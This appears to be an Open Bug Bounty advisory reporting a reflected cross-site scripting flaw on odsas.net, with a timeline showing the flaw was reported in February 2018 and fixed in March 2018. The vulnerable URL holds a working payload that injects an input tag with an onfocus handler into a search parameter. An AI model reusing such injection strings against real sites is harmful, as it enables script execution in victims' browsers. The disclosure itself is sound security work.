
odsas.net XSS vulnerability

Description

##### Open Bug Bounty ID: OBB-560666

Description | Value
---|---
Affected Website: | odsas.net
Vulnerable Application: | Custom Code
Vulnerability Type: | XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score: | 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Disclosure Standard: | Coordinated Disclosure based on ISO 29147 guidelines
Remediation Guide: | OWASP XSS Prevention Cheat Sheet

##### Vulnerable URL:

https://www.odsas.net/scan_sets.php?set_id=1537&serach;&search;_str=%22%27pantyhose%20high%20heels%3E%3Cinput/autofocus/onfocus%0C=prompt(/openbugbounty/)%3E%3Cimg%20src=%22https://healthylifestylepublication.com/wp-content/uploads/2016/12/iStock-536681400-1024x683.jpg%22%3E

##### Coordinated Disclosure Timeline

Description | Value
---|---
Vulnerability Reported: | 16 February, 2018 04:29 GMT
Vulnerability Verified: | 16 February, 2018 04:43 GMT
Website Operator Notified: | 16 February, 2018 04:43 GMT
Vulnerability Published: | 16 February, 2018 04:43 GMT [without any technical details]
Vulnerability Fixed: | 31 March, 2018 10:24 GMT
Public Disclosure: | 31 March, 2018 10:24 GMT